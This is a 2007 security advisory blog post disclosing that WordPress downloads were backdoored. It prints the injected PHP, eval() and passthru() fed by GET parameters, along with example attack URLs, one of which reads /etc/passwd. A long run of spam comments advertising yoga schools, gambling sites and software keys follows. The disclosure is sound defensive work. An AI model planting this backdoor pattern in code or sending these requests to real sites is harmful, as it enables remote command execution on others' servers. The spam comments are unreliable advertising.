While assessing the security of WordPress, a popular blog creation software, I have discovered that it's source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:
in wp-includes/feed.php
function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
in wp-includes/theme.php
function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
this would enable remote command execution on machines running compromised versions, for example
http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd
I have discovered this vulnerability on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads until further investigation. Later they determined that ony one of two servers has been compromised and that the two files mentioned above are the only ones changed.
It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible that you are running a compromised version, so be sure to check for the above code.
About Wordpress
"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time."
Thanks to Ryan Boren of WordPress for quick response and his feedback regarding this issue.
427 comments:
«Oldest ‹Older 401 – 427 of 427Nice post! Discover the ancient art of yoga and deepen your practice with a 200-hour Yoga Teacher Training in Rishikesh, the spiritual heart of India. Immerse yourself in the serene surroundings of the Himalayas while gaining comprehensive insights into yoga philosophy, asanas, meditation, and teaching methodologies. This transformative program offers a unique blend of traditional teachings and modern approaches, guided by experienced instructors.
Visit CMOLDS a website development company dubai offering great expertise and skills in web and app development and design.
Mind Flow Harmony is the top teacher training facility in Rishikesh and the best yoga school for beginners. We provide 100-hour, 200-hour, and 300-hour yoga teacher training programs in Rishikesh in addition to yoga nidra and anatomy courses.
100 Hour Yoga Teacher Training In Rishikesh
200 Hour Yoga Teacher Training In Rishikesh
300 Hour Yoga Teacher Training In Rishikesh
Explore how the Pharmaceutical Industry integrates ESG principles for sustainable growth with Venus Global Technology
ESG In Pharmaceutical Industry
nice blog
web design company in faridabad
Amazing approach to safeguarding data integrity and privacy, setting new standards in cyber security companies!
Transforming PL/SQL ETL to SnapLogic magic—bridging data with seamless efficiency!
Addressing the WordPress vulnerability promptly and comprehensively is critical to safeguarding your website, its data, and your users from any type of potential harm. Proactive security measures and vigilance are always essential for maintaining a secure online presence. boat rental abu dhabi
Join Our Best Yoga Certification Course In India
Meditation Teacher Training India
Yin Yoga teacher training in Rishikesh
5 Days Yoga Retreat In Rishikesh
Purchasing an original Microsoft Office licence key protects against software piracy and ensures peak performance and dependability.
microsoft office license key
I really like your blog, the information you’ve provided on the website.
Best Cardiologist in Bhopal
Your blog consistently delivers insightful and well-researched content that truly resonates with readers. I admire the way you articulate complex ideas with clarity and depth. Your dedication to providing valuable information is evident in every post. If you're planning to travel, be sure to check out our Dubai tourist places, travel tips, and inspiring stories
We’re truly grateful for this opportunity. Your support is greatly valued and contributes significantly to our shared goals. Discover the next level of financial technology with us. Explore our innovative solutions and see how they can transform your experience. Dive deeper and unlock the potential of our latest offerings—check this about what we have in store for you.
I’m thankful for your valuable input! "sfr service client mon compte" provides a streamlined approach to managing your SFR account.
Great post! I love how you capture the essence of the destination and provide practical tips for travellers. Your insights are always helpful and make me excited to explore new places. Keep sharing your adventures
Water Activities in Dubai
Thank you for sharing this insightful post! Your perspective on the topic is both refreshing and informative. Your writing is clear and engaging, making it easy to grasp and apply. Looking forward to more of your valuable content in the future.
legoland water park Dubai
Looking for a top-rated Website Designing Company In North Delhi? Look no further than Web Solution Centre. Our expert team specializes in creating stunning websites that elevate your brand presence online. Trust us for all your web design needs in North Delhi.
Renowned as the best digital marketing company in Chennai, Cortex Media Marketing provides tailored solutions that deliver exceptional results and enhance brand presence.
Bellatrum is a game-changer in the exhibition industry! Their focus on tailoring each stand to reflect a brand’s unique identity makes all the difference. From the innovative designs to the high-quality materials and expert project management, they make the process seamless and stress-free. It's clear they understand the importance of both aesthetics and functionality, ensuring that each stand not only looks fantastic but also works efficiently for client needs. Bellatrum is a perfect partner for businesses looking to make a big impact at their next event! https://bellatrum.com/
Thanks for the tips! Online Matka Play keeps me coming back for more.
Bellatrum takes exhibition stands to the next level! Their commitment to understanding each brand’s unique needs and translating them into standout designs is truly impressive. They go beyond aesthetics, focusing on functionality and engagement, making sure every stand serves as an effective marketing tool. With Bellatrum’s expertise, brands not only capture attention but also create lasting connections with their audience. Highly recommended for anyone serious about making an impact at their next event! Bellatrum Exhibition Stand Builder
Experience Unmatched Luxury at The White Ibis 🌟
Discover Sivasagar's premier luxury boutique hotel located on HCB Road, near Hemkosh Press. Enjoy elegant rooms, gourmet dining, and personalized service at The White Ibis, where tradition meets modern luxury. Book your unforgettable stay with us today! 🏨✨ Best Hotel in Assam sivasagar
Great information! Online Matka Play makes it easy for anyone to experience the excitement of Matka. The platform is simple yet effective, delivering quick updates and a smooth playing experience.
Looking for reliable results for your favorite game? Check out All Play Bazaar Disawar for the most accurate and up-to-date outcomes in a single place.
Bellatrum creates impressive, high-quality exhibition stands that capture brand identity and engage audiences effectively. Perfect for making a lasting impact at any event!! Bellatrum Exhibition Stand Builder
ECSOFT, the best software development company in Chennai, delivers innovative technology solutions tailored to businesses across India and beyond. From ERP, CRM, billing software, and e-commerce platforms to mobile app development. ECSOFT empowers organizations to streamline operations and enhance customer engagement. With over 25 years of expertise and a portfolio of 5,000+ satisfied clients worldwide, we are committed to turning your vision into reality.
hgjajingfnvbnnskbnk
Post a Comment